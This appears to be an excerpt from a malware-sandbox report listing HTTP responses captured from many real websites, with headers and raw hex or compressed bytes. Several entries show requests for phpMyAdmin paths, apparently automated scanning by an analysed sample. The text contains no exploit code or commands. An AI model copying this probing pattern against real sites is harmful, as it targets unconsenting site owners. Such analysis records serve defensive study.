Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33set-cookie: apbct_timestamp=1703276095; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_site_landing_ts=1703276095; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_page_hits=1; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%252216aae9c91218714c96849f767107d693%2522%257D; path=/; HttpOnly; SameSite=Laxset-cookie: apbct_urls=%7B%22fuckyoufriday.com.au%2Fphpmyadmin%2F%22%3A%5B1703276095%5D%7D; expires=Mon, 25-Dec-2023 20:14:55 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25-Dec-2023 20:14:55 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; HttpOnly; SameSite=Laxset-cookie: ct_sfw_pass_key=e069c2df4180b2c12608affc9bf7d5e00; expires=Sun, 21-Jan-2024 20:14:55 GMT; Max-Age=2592000; path=/; SameSite=Laxexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://fuckyoufriday.com.au/wp-json/>; rel=Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:56 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /PhpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 22 Dec 2023 20:14:56 GMTData Raw: 31 31 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 5b 6d 73 db b6 b2 fe 1c cf f4 3f d0 cc 54 21 1b 90 22 a9 57 53 51 3a e7 a4 e9 9d 73 a7 bd 39 d3 34 73 3f c4 9d 0c 44 2e 25 26 14 c1 02 a0 25 1f 55 ff fd 0e 00 be 89 a2 2c c5 4e af 27 b1 2d 70 f1 3c 8b c5 ee 02 58 d0 af ae 43 12 f0 fb 0c b4 15 5f 27 af bf bb 7a 25 7e 6a 09 4e 97 73 1d 52 eb c3 7b fd f5 77 57 a2 19 70 f8 fa bb ab 67 af d6 c0 b1 16 ac 30 65 c0 e7 fa 87 df 7f b6 a6 42 a4 78 90 e2 35 cc f5 bb 18 36 19 a1 5c d7 02 92 72 48 f9 5c df c4 21 5f cd 43 b8 8b 03 b0 e4 07 a4 c5 69 cc 63 9c 58 2c c0 09 cc 5d 05 93 c4 e9 17 8d 42 32 d7 33 4a a2 38 01 5d 5b 51 88 e6 fa 8a f3 8c f9 fd fe 72 9d 2d 6d 42 97 fd 6d 94 f6 5d d9 4b d0 f3 98 27 f0 fa df 78 09 5a 4a b8 16 91 3c 0d b5 de f3 a9 e7 ba 33 ed 5d 00 38 8d 03 ed 77 8a e3 04 28 7b d5 57 e2 57 6a 38 52 eb 17 94 2c 08 67 2f 2a 9d 5f ac f1 d6 8a d7 78 09 56 46 41 8c c9 4f 30 5d c2 0b ad ff fa ea 55 ad 27 4e 38 d0 14 73 d0 35 61 c9 b9 8e b3 2c 89 03 cc 63 92 f6 29 63 2f b7 eb 44 d7 24 e1 5c 6f 6b a2 f5 28 fe 33 27 33 ed 67 80 b0 3d 54 a2 d4 e6 85 d6 76 40 d6 36 ce fb 11 40 d8 d7 ff 16 2d de 90 f5 1a 52 ce be 46 9d a0 e8 d3 d4 8b 05 34 ce f8 eb ab 4d 9c 86 64 63 7f da 64 b0 26 9f e3 f7 c0 79 9c 2e 99 36 d7 76 fa 02 33 f8 40 13 dd 2f a6 f6 b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Mon, 16 Oct 2023 04:34:27 GMTETag: W/"400-607cdebea636c"Content-Encoding: gzipData Raw: 32 35 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b b4 24 a3 81 76 1d 4d c6 28 a5 0c 45 3e c5 22 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba de de de 2c 8a ea 7a 75 b9 e4 db 76 bd bd 59 2d 2e 3e 5e c0 0f 47 f0 dd 45 5b 57 f3 fc b2 a8 ae 2e 37 2b 68 3c aa 6f e5 1c bd 77 fe 4f ed 64 98 97 8b ea c3 74 fa a8 15 18 42 58 af e0 cb d3 a2 9a a7 c3 fc e1 11 6d ad d5 d3 74 ca e4 f3 a3 c8 d5 dd f2 21 49 9e 2f fe 11 e1 a7 62 db 20 78 fc 1b 31 10 d6 c0 e4 b1 45 4b d0 8b 00 96 ed a8 64 07 9c 05 6a 74 80 80 fe 19 fd ac a8 7e 26 ae 7b be 5c 2e 97 f7 ab cd 66 51 fc c6 1d 6c c6 cf 20 08 3a a9 98 29 cc a4 6b 67 cd 81 6d bc 9d 63 97 d9 ca 3c b7 50 a4 20 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d5 d2 bb e0 14 41 c3 66 44 5d b3 3f 01 d2 20 5b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 b5 25 f4 16 09 56 2f 9d 71 9e ad c2 5a b1 75 04 c2 17 02 a7 32 46 58 18 bb 3c 0b d0 62 08 62 8f c0 e1 4a 72 0e 42 2b 8c 29 27 10 3a 94 5a 69 c9 4f 43 06 19 3e c9 54 8c fd 7c fe 09 76 03 61 98 fc 2f c8 5d b2 1b 1b 32 46 53 00 d7 1f d5 4e 5a 33 78 70 11 24 13 a5 93 89 32 39 53 93 0c d9 45 02 4d ec ac 63 26 1a 80 bc 96 07 be 39 50 9a 27 11 7a 4d b2 61 b4 31 58 67 44 c9 9e 3d e5 44 27 8d 50 ce 60 9b 88 5b 14 96 7d 3a 05 d2 45 1f f0 a8 32 8a 86 86 eb 7e 87 03 e1 11 24 da c0 ed d5 9c 12 6a 54 22 1a 9a 65 ad f5 7a 03 c2 f4 62 08 a7 a0 ef f1 23 73 22 31 ce ee 33 08 ad 8b fb 26 45 68 c5 81 b7 f5 fd 90 78 be 5d 37 24 c3 98 01 bd f3 07 e1 c7 cd e3 b9 1c 8b 08 ba ed 0c 7e 85 4e d4 e3 44 c7 09 e6 f3 a7 21 72 37 0d af c8 4e ef 39 6d 3b ee b1 d1 ac 38 ee 2e cb 77 31 34 5c 6e 06 b9 b4 46 69 35 94 7e 46 68 78 cd 53 62 c1 1d 53 8f 86 5f 8d 23 86 56 5b dd c6 f6 98 ff ee ad c7 71 6e 3c 26 7c 11 92 cc 00 7d 6a 7b 70 f1 8c a3 7b 14 b5 3e a5 f7 7a df 10 ff 4b 7d a6 e0 9f f2 15 cf fd b9 60 00 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25eeSk0_qK_n$vM(E>"I{2},zuvY-.>^GE[W.7+h<owOdtBXmt!I/b x1EKdjt~&{\.fQl :)kgmc<P LUSAfD]? [}E%%V/qZu2FX<bbJrB+)':ZiOC>T\|va/]2FSNZ3xp$29SEMc&9P'zMa1XgD=D'P`[}:E2~$jT"ezb#s"13&Ehx]7$~ND!r7N9m;8.w14\nFi5~FhxSbS_#V[qn<&\|}j{p{>zK}`0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:56 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276096.7261710119188132426Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjBdxec7r7DHGEpZo2ij+25kavE0ZtMXws1mfakihq4B,2d58ifebGbosy5xc+FRalvTlJZ0NnGdLV+0426SnY8M1FKDjUzEwYyQI8XAr7nX/gSfShFyAtmOtxPQQJ/BIkA==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,WGyvRTg/W7ELiCMotIb4YdEwTEEhp6uA5JPt8GDAULc=,WDMzHiyOL7uW518fW2Byr1GGJYTZnI0mzytC6AI4pezK/jI29vTDJ6LpM0msr1rxwGIxk8ywnn53HYftlNaElQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:56 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:56 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 6d 75 72 61 6d 62 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at omuramba.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:56 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: 2FA2Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 